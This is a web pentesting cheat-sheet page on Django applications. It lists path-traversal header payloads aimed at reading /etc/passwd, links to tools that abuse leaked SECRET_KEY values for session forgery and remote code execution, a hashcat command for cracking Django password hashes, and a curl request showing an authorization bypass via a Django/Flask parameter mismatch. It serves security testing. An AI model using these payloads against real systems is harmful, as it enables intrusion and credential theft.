Django

Django Apps Pentesting

Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{

File Inclusion LFI / RFI

[DEBUG=True]

Why Django’s [DEBUG=True] is a Goldmine for HackersMedium

Escalating debug mode in Django to RCE, SSRF, SQLiVidoc Security Lab - blog

SSTI

GitHub - iangcarroll/cookiemonster: 🍪 CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.GitHub

Checks django's session cookies (when in signed_cookie mode) for known django secret_key

BadSecrets

GitHub - blacklanternsecurity/badsecrets: A library for detecting known secrets across many web frameworksGitHub

Leaked SECRET_KEY

GitHub - 0xuf/DJRCE: Simple django rce exploitation with leaked SECRET_KEY variableGitHub

Remote Code Execution on a Facebook server – SCRT Team Blog

HTB: Developer0xdf hacks stuff

SECRET_KEY required

Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session TokensGitHub

Password Cracking

hashcat -m 10000 --force django.hash /usr/share/wordlists/rockyou.txt

GitHub - xros/py_django_crack: Crack the django password on the way. By default Django use pbkdf2 and sha256 method to encrypt user's password. Once get the password stored in the database table, you need to compare it with others if brute force cracking. It is recommended that you use hash table comparison. The tool 'rainbow crack' can generate rainbow hash tables while another tool 'hashcat' brute-force cracks password from a dictionary alive. Because django uses PBKDF2(Password-Based Key Derivation Function), it would take too long to generate a password.GitHub

Django - Flask: Parameter mismatch

Frontend API: Written in Django
Backend API (internal service): Written in Flask
The frontend /user endpoint checks authorization and then proxies the request to Flask for data handling.

curl -X GET "https://target.com/user?user_id=1234" \
  -H "Content-Type: application/json" \
  -d '{"user_id": 9999}'

$5,000 | Authorization Bypass via Parameter Parsing Mismatch (Django — Flask)Medium

Resources

Django Security - OWASP Cheat Sheet Series

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousCMS NextFlask / Werkzeug

Last updated 12 days ago